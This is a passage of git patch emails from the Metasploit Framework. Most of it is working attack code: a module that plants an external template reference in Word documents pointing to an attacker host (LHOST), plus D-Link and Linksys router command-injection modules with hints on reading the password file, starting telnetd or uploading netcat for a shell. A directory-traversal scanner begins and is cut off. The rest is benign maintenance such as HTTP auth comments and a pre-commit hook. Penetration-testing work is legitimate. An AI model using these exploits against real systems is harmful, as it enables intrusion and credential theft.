"2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">" + metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>" #where to find the skeleton files required for creating an empty document - dataDir = File.join(Msf::Config.install_root, "data", "exploits", "docx") - tmpDir = "#{Dir.tmpdir}/unc_tmp" - - #setup temporary directory structure - begin - cleanupTmp(tmpDir) - FileUtils.mkdir_p("#{tmpDir}/docProps/") - FileUtils.mkdir_p("#{tmpDir}/word/_rels/") - rescue - print_error("Error generating temp directory structure.") - return nil - end - - #here we store our on-the-fly created files - begin - f = File.open("#{tmpDir}/docProps/core.xml", 'wb') - f.write(metadataFileData) - f.close() - f = File.open("#{tmpDir}/word/_rels/settings.xml.rels", 'wb') - f.write(@relsFileData) - f.close() - rescue - print_error("Cant write to temp file.") - cleanupTmp(tmpDir) - return nil - end + data_dir = File.join(Msf::Config.install_root, "data", "exploits", "docx") #making the actual docx - begin - docx = Rex::Zip::Archive.new - #add skeleton files - vprint_status("Adding skeleton files from #{dataDir}") - Dir["#{dataDir}/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub(dataDir,''), File.read(file)) - end - end - #add on-the-fly created documents - vprint_status("Adding injected files") - Dir["#{Dir.tmpdir}/unc_tmp/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub("#{Dir.tmpdir}/unc_tmp/",''), File.read(file)) - end + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding skeleton files from #{data_dir}") + Dir["#{data_dir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(data_dir,''), File.read(file)) end - #add the otherwise skipped "hidden" file - file = "#{dataDir}/_rels/.rels" - docx.add_file(file.sub(dataDir,''), File.read(file)) - file_create(docx.pack) - rescue - print_error("Error creating empty document #{datastore['FILENAME']}") - cleanupTmp(tmpDir) - return nil end - - cleanupTmp(tmpDir) - return 0 + #add on-the-fly created documents + vprint_status("Adding injected files") + docx.add_file("docProps/core.xml", metadata_file_data) + docx.add_file("word/_rels/settings.xml.rels", @rels_file_data) + #add the otherwise skipped "hidden" file + file = "#{data_dir}/_rels/.rels" + docx.add_file(file.sub(data_dir,''), File.read(file)) + #and lets create the file + file_create(docx.pack) end - #cleaning up of temporary files. If it fails we say so, but continue anyway - def cleanupTmp(dir) - begin - FileUtils.rm_rf(dir) - rescue - print_error("Error cleaning up tmp directory structure.") - end - end - - #here we inject an UNC path into an existing file, and store the injected file in FILENAME - def manipulateFile - #where do we unpack our source file? - tmpDir = "#{Dir.tmpdir}/#{Time.now.to_i}#{rand(1000)}/" + def manipulate_file + #where do we unpack our source files + tmp_dir = "#{Dir.tmpdir}/unc#{Time.now.to_i}#{rand(1000)}/" ref = "<w:attachedTemplate r:id=\"rId1\"/>" - if File.exists?(datastore['SOURCE']) - if not File.stat(datastore['SOURCE']).readable? - print_error("Not enough rights to read the file. Aborting.") - return nil - end - - #lets extract our docx - if unzipDocx(tmpDir).nil? - return nil - end - - fileContent = File.read("#{tmpDir}/word/settings.xml") + if not File.exists?(datastore['SOURCE']) + print_error("File #{datastore['SOURCE']} does not exist.") + return nil + end + + if not File.stat(datastore['SOURCE']).readable? + print_error("Not enough rights to read the file. Aborting.") + return nil + end - if not fileContent.index("w:attachedTemplate r:id=\"rId1\"").nil? - vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") + #lets extract our docx + if unzip_docx(tmp_dir).nil? + return nil + end - #we put just our rels file into the docx - if updateDocxFile(tmpDir,"word/_rels/settings.xml.rels", @relsFileData).nil? - return nil - end + file_content = File.read("#{tmp_dir}/word/settings.xml") - # lets zip the end result - if zipDocx(tmpDir).nil? - return nil + #if we can find the reference, we don't need to add it and can just inject our unc file. + if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil? + vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") + update_docx_file(tmp_dir,"word/_rels/settings.xml.rels", @rels_file_data) + # lets zip the end result + zip_docx(tmp_dir) + else + #now insert the reference to the file that will enable our malicious entry + insert_one = file_content.index("<w:defaultTabStop") + + if insert_one.nil? + insert_two = file_content.index("<w:hyphenationZone") # 2nd choice + if not insert_two.nil? + vprint_status("HypenationZone found, we use this for insertion.") + file_content.insert(insert_two, ref ) end else - #now insert the reference to the file that will enable our malicious entry - insertOne = fileContent.index("<w:defaultTabStop") - - if insertOne.nil? - insertTwo = fileContent.index("<w:hyphenationZone") # 2nd choice - if not insertTwo.nil? - vprint_status("HypenationZone found, we use this for insertion.") - fileContent.insert(insertTwo, ref ) - end - else - vprint_status("DefaultTabStop found, we use this for insertion.") - fileContent.insert(insertOne, ref ) - end - - if insertOne.nil? && insertTwo.nil? - print_error("Cannot find insert point for reference into settings.xml") - cleanupTmp(tmpDir) - return nil - end + vprint_status("DefaultTabStop found, we use this for insertion.") + file_content.insert(insert_one, ref ) + end - #lets extract our docx - if unzipDocx(tmpDir).nil? - return nil - end + if insert_one.nil? && insert_two.nil? + print_error("Cannot find insert point for reference into settings.xml") + FileUtils.rm_rf(tmp_dir) + return nil + end - #update the files that contain the injection and reference - if updateDocxFile(tmpDir, "word/settings.xml",fileContent).nil? - print_error("Error inserting data into word/settings.xml") - return nil - end - if updateDocxFile(tmpDir, "word/_rels/settings.xml.rels", @relsFileData).nil? - print_error("Eror inserting data into word/_rels/settings.xml.rels") - return nil - end + #update the files that contain the injection and reference + update_docx_file(tmp_dir, "word/settings.xml",file_content) + update_docx_file(tmp_dir, "word/_rels/settings.xml.rels", @rels_file_data) - #lets zip the file - if zipDocx(tmpDir).nil? - return nil - end + #lets zip the file + zip_docx(tmp_dir) + end + return 0 + end + #making the actual docx + def zip_docx(tmp_dir) + docx = Rex::Zip::Archive.new + #add skeleton files + vprint_status("Adding files from #{tmp_dir}") + Dir["#{tmp_dir}/**/**"].each do |file| + if not File.directory?(file) + docx.add_file(file.sub(tmp_dir,''), File.read(file)) end - else - print_error("File #{datastore['SOURCE']} does not exist.") - return nil end - - cleanupTmp(tmpDir) - return 0 + #add the otherwise skipped "hidden" file + file = "#{tmp_dir}/_rels/.rels" + docx.add_file(file.sub(tmp_dir,''), File.read(file)) + file_create(docx.pack) + FileUtils.rm_rf(tmp_dir) end - #making the actual docx - def zipDocx(tmpDir) + #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way + def unzip_docx(tmp_dir) + #create temoprary directory so we can do some error handling if needed. begin - docx = Rex::Zip::Archive.new - #add skeleton files - vprint_status("Adding files from #{tmpDir}") - Dir["#{tmpDir}/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub(tmpDir,''), File.read(file)) - end + if File.directory?(tmp_dir) + FileUtils.rm_rf(tmp_dir) end - #add the otherwise skipped "hidden" file - file = "#{tmpDir}/_rels/.rels" - docx.add_file(file.sub(tmpDir,''), File.read(file)) - file_create(docx.pack) + FileUtils.mkdir_p(tmp_dir) rescue - print_error("Error creating compressed document #{datastore['FILENAME']}") - cleanupTmp(tmpDir) + print_error("Error creating/deleting temporary directory #{tmp_dir}, check rights.") return nil end - end - - #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way - def unzipDocx(tmpDir) + #unzip the SOURCE document into the tmp_dir + vprint_status("Rubyzip sometimes corrupts the document, so we do it the hard way. Extracting #{datastore['SOURCE']}") begin - if not File.directory?(tmpDir) - vprint_status("Damn rubyzip cant be relied upon, so we do it the hard way. Extracting #{datastore['SOURCE']}") - Zip::ZipFile.open(datastore['SOURCE']) do |fileZip| - fileZip.each do |entry| - fpath = File.join(tmpDir, entry.name) - FileUtils.mkdir_p(File.dirname(fpath)) - fileZip.extract(entry, fpath) - end + Zip::ZipFile.open(datastore['SOURCE']) do |filezip| + filezip.each do |entry| + fpath = File.join(tmp_dir, entry.name) + FileUtils.mkdir_p(File.dirname(fpath)) + filezip.extract(entry, fpath) end end - rescue - print_error("There was an error unzipping.") - cleanupTmp(tmpDir) + rescue Zip::ZipError => e + print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.") return nil end return 0 end #used for updating the files inside the docx from a string - def updateDocxFile(tmpDir,fileString, content) - begin - archive = File.join(tmpDir, fileString) - vprint_status("We need to look for: #{archive}") - if File.exists?(archive) - vprint_status("Deleting original file #{archive}") - File.delete(archive) - end - File.open(archive, 'wb+') { |f| f.write(content) } - rescue Exception => ex - print_error("Well, extracting and manipulating the file went wrong :(") - cleanupTmp(tmpDir) - return nil + def update_docx_file(tmp_dir,file_string, content) + archive = File.join(tmp_dir, file_string) + vprint_status("We need to look for: #{archive}") + if File.exists?(archive) + vprint_status("Deleting original file #{archive}") + File.delete(archive) end - return 0 + File.open(archive, 'wb+') { |f| f.write(content) } end def run - #we need this in makeNewFile and manipulateFile - @relsFileData = "" - @relsFileData << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp - @relsFileData << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp - @relsFileData << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp - @relsFileData << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" + #we need this in make_new_file and manipulate_file + @rels_file_data = "" + @rels_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>".chomp + @rels_file_data << "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">".chomp + @rels_file_data << "<Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/".chomp + @rels_file_data << "attachedTemplate\" Target=\"file://\\\\#{datastore['LHOST']}\\normal.dot\" TargetMode=\"External\"/></Relationships>" if "#{datastore['SOURCE']}" == "" #make an empty file print_status("Creating empty document") - if not makeNewFile.nil? - print_good("Success! Empty document #{datastore['FILENAME']} created.") - end + make_new_file else #extract the word/settings.xml and edit in the reference we need print_status("Injecting UNC path into existing document.") - if not manipulateFile.nil? + if not manipulate_file.nil? print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.") end end From 43f3bb4fe602755a8b997126428d591fecf82b1a Mon Sep 17 00:00:00 2001 From: m-1-k-3 <github@s3cur1ty.de> Date: Tue, 5 Feb 2013 13:54:10 +0100 Subject: [PATCH 286/421] small updates --- .../http/dlink_dir_300_600_exec_noauth.rb | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index 9b24a0fa80f7..feea8e0d3e4d 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -13,12 +13,13 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'D-Link DIR-600 rev B / DIR-300 rev B unauthenticated Remote Command Execution in command.php', + 'Name' => 'D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution', 'Description' => %q{ - Some D-Link Routers are vulnerable to OS Command injection. + Some D-Link Routers like the DIR-600 rev B and the DIR-300 rev B are + vulnerable to OS Command injection. You do not need credentials to the webinterface because the command.php is accesseble without authentication. You could read the plaintext password - file. + file. Tested versions: DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below. Hint: To get a remote shell you could start the telnetd without any authentication. }, 'Author' => [ 'm-1-k-3' ], @@ -35,14 +36,14 @@ def initialize(info = {}) register_options( [ Opt::RPORT(80), - OptString.new('CMD', [ true, 'The command to execute', 'cat /var/passwd']) + OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd']) ], self.class) end def run uri = '/command.php' - print_status("Sending remote command: " + datastore['CMD']) + print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD']) data_cmd = "cmd=#{datastore['CMD']}; echo end" @@ -63,11 +64,11 @@ def run end if res.body.include? "end" - print_status("Exploited successfully") - print_line("Command: #{datastore['CMD']}") - print_line("Output: #{res.body}") + print_status("#{rhost}:#{rport} - Exploited successfully\n") + print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n") + print_line("#{rhost}:#{rport} - Output: #{res.body}") else - print_status("Exploit failed.") + print_status("#{rhost}:#{rport} - Exploit failed.") end end end From 463a45ccafd3ceb6fefffa2a2375615bf64569ec Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Tue, 5 Feb 2013 09:57:33 -0600 Subject: [PATCH 287/421] if we don't support the auth return original res make sure we return the original 401 if we don't support the auth. --- lib/rex/proto/http/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index c06de1884e38..771230edd80b 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -431,6 +431,7 @@ def send_auth(res, opts, t, persist) end return res end + return res end def basic_auth_header(username,password) From 16b4fb1faa8fab1009d4fc7ee0d31828591c178e Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Tue, 5 Feb 2013 10:36:51 -0600 Subject: [PATCH 288/421] Added some comment documentation --- lib/rex/proto/http/client.rb | 37 ++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 771230edd80b..ade8eb339721 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -392,10 +392,21 @@ def send_request(req, t = -1) conn.put(req.to_s) end + # Validates that the client has creds def have_creds? !(self.username.nil?) && self.username != '' end + # + # Params - + # res = The 401 response we need to auth from + # opts = the opts used to generate the request that created this response + # t = the timeout for the http requests + # persist = whether to persist the tcp connection for HTTP Pipelining + # + # Parses the response for what Authentication methods are supported. + # Sets the corect authorization options and passes them on to the correct + # method for sending the next request. def send_auth(res, opts, t, persist) supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' @@ -434,11 +445,28 @@ def send_auth(res, opts, t, persist) return res end + # Converts username and password into the HTTP Basic + # authorization string. def basic_auth_header(username,password) auth_str = username.to_s + ":" + password.to_s auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end + + # + # Opts - + # Inherits all the same options as send_request_cgi + # Also expects some specific opts + # DigestAuthUser - The username for DigestAuth + # DigestAuthPass - The password for DigestAuth + # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support + # + # This method builds new request to complete a Digest Authentication cycle. + # We do not persist the original connection , to clear state in preparation for our auth + # We do persist the rest of the connection stream because Digest is a tcp session + # based authentication method. + # + def digest_auth(opts={}) @nonce_count = 0 @@ -572,6 +600,15 @@ def digest_auth(opts={}) end end + # + # Opts - + # Inherits all the same options as send_request_cgi + # provider - What Negotiate Provider to use (supports NTLM and Negotiate) + # + # Builds a series of requests to complete Negotiate Auth. Works essentially + # the same way as Digest auth. Same pipelining concerns exist. + # + def negotiate_auth(opts={}) ntlm_options = { :signing => false, From 80a8bab02f14ff3db4f1f83b955388b18144d4f6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Tue, 5 Feb 2013 10:37:24 -0600 Subject: [PATCH 289/421] Correct the CVE reference --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index da5e53993055..ac7286c9b043 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -30,7 +30,7 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2012-5858' ], + [ 'CVE', '2012-5958' ], [ 'US-CERT-VU', '922681' ], [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ] ], From 888bb80ab6acf9408a1488c3b0f75676ae24a9a5 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Tue, 5 Feb 2013 11:55:12 -0600 Subject: [PATCH 290/421] more comments --- lib/rex/proto/http/client.rb | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ade8eb339721..d6d3fc68f2dd 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -359,9 +359,9 @@ def close end # - # Transmit an HTTP request and receive the response - # If persist is set, then the request will attempt - # to reuse an existing connection. + # Sends a request and gets a response back + # If the request is a 401, and we have creds, it will attempt to + # complete authentication and return the final response # def send_recv(req, t = -1, persist=false) opts = req[:opts] @@ -373,6 +373,11 @@ def send_recv(req, t = -1, persist=false) res end + # + # Transmit an HTTP request and receive the response + # If persist is set, then the request will attempt + # to reuse an existing connection. + # def _send_recv(req, t = -1, persist=false) if req.kind_of? Hash and req[:string] req = req[:string] @@ -608,7 +613,7 @@ def digest_auth(opts={}) # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # - + def negotiate_auth(opts={}) ntlm_options = { :signing => false, From b3e828359d479a17d2a2a0975460563276fd7c7a Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Wed, 6 Feb 2013 01:02:46 +0200 Subject: [PATCH 291/421] Web::HTTP#_request: allow Rex opt level overrides Allow overriding options at the Rex level when performing requests via the Auxiliary::Web::HTTP wrapper. --- lib/msf/core/auxiliary/web/http.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 0a59187c02f2..a7c8fc86e38c 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -266,10 +266,12 @@ def queue( request ) end def _request( url, opts = {} ) - body = opts[:body] + body = opts[:body] timeout = opts[:timeout] || 10 - method = opts[:method].to_s.upcase || 'GET' - url = url.is_a?( URI ) ? url : URI( url.to_s ) + method = opts[:method].to_s.upcase || 'GET' + url = url.is_a?( URI ) ? url : URI( url.to_s ) + + rex_overrides = opts.delete( :rex ) || {} param_opts = {} @@ -285,10 +287,11 @@ def _request( url, opts = {} ) end opts = @request_opts.merge( param_opts ).merge( - 'uri' => url.path || '/', - 'method' => method, + 'uri' => url.path || '/', + 'method' => method, 'headers' => headers.merge( opts[:headers] || {} ) - ) + # Allow for direct rex overrides + ).merge( rex_overrides ) opts['data'] = body if body From faeaa74a49c905b11082bd00e4e05175b626c38e Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 11:06:13 -0600 Subject: [PATCH 292/421] Msftidy whitespace --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 311bb838967b..632a991c0f98 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -76,7 +76,7 @@ def find_files(file,user,pass) :category => "web", :method => "GET" }) - + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") elsif res and res.code @@ -89,7 +89,7 @@ def run_host(ip) pass = datastore['PASSWORD'] vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") - + #test login begin res = send_request_cgi({ From 734bd614e1e6a6bbd758e299ce82f0d340a051fe Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 11:13:30 -0600 Subject: [PATCH 293/421] Adds a pre-commit hook that fires off msftidy If people use this, it'll cut down quite a bit on trivial module errors. --- tools/dev/pre-commit-hook.rb | 50 ++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100755 tools/dev/pre-commit-hook.rb diff --git a/tools/dev/pre-commit-hook.rb b/tools/dev/pre-commit-hook.rb new file mode 100755 index 000000000000..f4e712a15291 --- /dev/null +++ b/tools/dev/pre-commit-hook.rb @@ -0,0 +1,50 @@ +#!/usr/bin/env ruby + +# Check that modules actually pass msftidy checks first. +# To install this script, make this your pre-commit hook your local +# metasploit-framework clone. For example, if you have checked out +# the Metasploit Framework to: +# +# /home/mcfakepants/git/metasploit-framework +# +# then you will copy this script to: +# +# /home/mcfakepants/git/metasploit-framework/.git/hooks/pre-commit +# +# You must mark it executable (chmod +x), and do not name it +# pre-commit.rb (just pre-commit) + +valid = true # Presume validity +files_to_check = [] + +results = %x[git diff --cached --name-only] + +results.each_line do |fname| + fname.strip! + next unless File.exist?(fname) and File.file?(fname) + next unless fname =~ /modules.+\.rb/ + files_to_check << fname +end + +if files_to_check.empty? + puts "--- No Metasploit modules to check, committing. ---" +else + puts "--- Checking module syntax with tools/msftidy.rb ---" + files_to_check.each do |fname| + cmd = "ruby ./tools/msftidy.rb #{fname}" + msftidy_output= %x[ #{cmd} ] + puts "#{fname} - msftidy check passed" if msftidy_output.empty? + msftidy_output.each_line do |line| + valid = false + puts line + end + end + puts "-" * 52 +end + +unless valid + puts "msftidy.rb objected, aborting commit" + puts "To bypass this check use: git commit --no-verify" + puts "-" * 52 + exit(1) +end From 22e3458ceacb519ef75c156f1f3ec09dd6c943c0 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 6 Feb 2013 11:27:58 -0600 Subject: [PATCH 294/421] Fix multi-line output due to bad regex flag --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 48990169786a..2488a21d06eb 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -144,14 +144,14 @@ def scanner_process(data, shost, sport) } } - if data =~ /^Server:[\s]*(.*)/mi + if data =~ /^Server:[\s]*(.*)/i @results[skey][:info][:server] = $1.strip end ssdp_host = nil ssdp_port = 80 location_string = '' - if data =~ /^Location:[\s]*(.*)/mi + if data =~ /^Location:[\s]*(.*)/i location_string = $1 @results[skey][:info][:location] = $1.strip if location_string[/(https?):\x2f\x2f([^\x5c\x2f]+)/] @@ -168,7 +168,7 @@ def scanner_process(data, shost, sport) end end - if data =~ /^USN:[\s]*(.*)/mi + if data =~ /^USN:[\s]*(.*)/i @results[skey][:info][:usn] = $1.strip end From e175e2c9e9b321a955f96bf7e4902835b7c372d2 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 12:19:57 -0600 Subject: [PATCH 295/421] typo in method name --- modules/auxiliary/scanner/misc/dvr_config_disclosure.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index b2e36eaefa5d..3201f3f340af 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -37,7 +37,7 @@ def initialize end - def get_ppooe_credentials(conf) + def get_pppoe_credentials(conf) user = "" password = "" @@ -208,7 +208,7 @@ def run_host(ip) get_ftp_credentials(conf) get_dvr_credentials(conf) get_ddns_credentials(conf) - get_ppooe_credentials(conf) + get_pppoe_credentials(conf) dvr_name = "" if res.body =~ /DVR_NAME=(.*)/ From 5357e236751fc0a07f522e89425ed30b40148e6c Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 12:46:50 -0600 Subject: [PATCH 296/421] Fixups to the Linksys module Professionalizes the description a little, but more importantly, handles LANIP better, I think. Instead of faking a 1.1.1.1 address, just detect if it's set or not in a method and return the right thing accordingly. Please test this before landing, obviously. I think it's what's intended. --- .../admin/http/linksys_wrt54gl_exec.rb | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index ea37ca8e21a8..2c99d9c9f41c 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -20,13 +20,12 @@ def initialize(info = {}) of the application. Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. - Note: This is a blind os command injection vulnerability. This means that + Note: This is a blind OS command injection vulnerability. This means that you will not see any output of your command. Try a ping command to your - local system for a first test. + local system and observe the packets with tcpdump (or equivalent) for a first test. Hint: To get a remote shell you could upload a netcat binary and exec it. - WARNING: Backup your network and dhcp configuration. We will overwrite it! - Have phun + WARNING: this module will overwrite network and DHCP configuration. }, 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE, @@ -50,13 +49,23 @@ def initialize(info = {}) OptString.new('PASSWORD',[ false, 'Password to login with', 'password']), OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), - OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), + OptAddress.new('LANIP', [ false, 'LAN IP address of the router (default is RHOST)']), OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']) ], self.class) end + # If the user configured LANIP, use it. Otherwise, use RHOST. + # NB: This presumes a dotted quad ip address. + def lan_ip + if datastore['LANIP'].to_s.empty? + datastore['RHOST'] + else + datastore['LANIP'] + end + end + def run #setting up some basic variables uri = datastore['TARGETURI'] @@ -67,13 +76,7 @@ def run wandomain = datastore['WAN_DOMAIN'] wanmtu = datastore['WAN_MTU'] - if datastore['LANIP'] !~ /1.1.1.1/ - #there is a configuration from the user so we use LANIP for the router configuration - ip = datastore['LANIP'].split('.') - else - #no configuration from user so we use RHOST for the router configuration - ip = rhost.split('.') - end + ip = lan_ip.split('.') if datastore['PASSWORD'].nil? pass = "" From 7d9982f6accba653b6057cb9801d6ac436151a79 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 6 Feb 2013 14:07:20 -0600 Subject: [PATCH 297/421] Add pcaprub to gem deps --- Gemfile | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Gemfile b/Gemfile index fc720a23b7a5..3d5f14fe4c89 100755 --- a/Gemfile +++ b/Gemfile @@ -16,6 +16,8 @@ gem 'nokogiri' gem 'pg', '>= 0.11' # Needed by anemone crawler gem 'robots' +# For sniffer and raw socket modules +gem 'pcaprub' group :development do # Markdown formatting for yard From d5b0482127f4cc66ce7c4f16febaff6328de1f72 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 6 Feb 2013 14:19:18 -0600 Subject: [PATCH 298/421] Note linking strat in comment docs --- tools/dev/pre-commit-hook.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/tools/dev/pre-commit-hook.rb b/tools/dev/pre-commit-hook.rb index f4e712a15291..2625d6d64af6 100755 --- a/tools/dev/pre-commit-hook.rb +++ b/tools/dev/pre-commit-hook.rb @@ -13,6 +13,10 @@ # # You must mark it executable (chmod +x), and do not name it # pre-commit.rb (just pre-commit) +# +# If you want to keep up on changes with this hook, just: +# +# ln -sf <this file> <path to commit hook> valid = true # Presume validity files_to_check = [] From b09f819e4bd49c9683a7c261a3a65599bcc9e42f Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 6 Feb 2013 17:02:07 -0600 Subject: [PATCH 299/421] Add Simple Web Server dir traversal --- .../http/simple_webserver_traversal.rb | 106 ++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 modules/auxiliary/scanner/http/simple_webserver_traversal.rb diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb new file mode 100644 index 000000000000..a4cf884e184d --- /dev/null +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -0,0 +1,106 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Simple Web Server 2.3-RC1 Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in + Simple Web Server 2.3-RC1. + }, + 'References' => + [ + [ 'OSVDB', '88877' ], + [ 'EDB', '23886' ], + [ 'URL', 'http://seclists.org/bugtraq/2013/Jan/12' ] + ], + 'Author' => + [ + 'CwG GeNiuS', + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Jan 03 2013" + )) + + register_options( + [ + OptString.new('FILEPATH', [true, 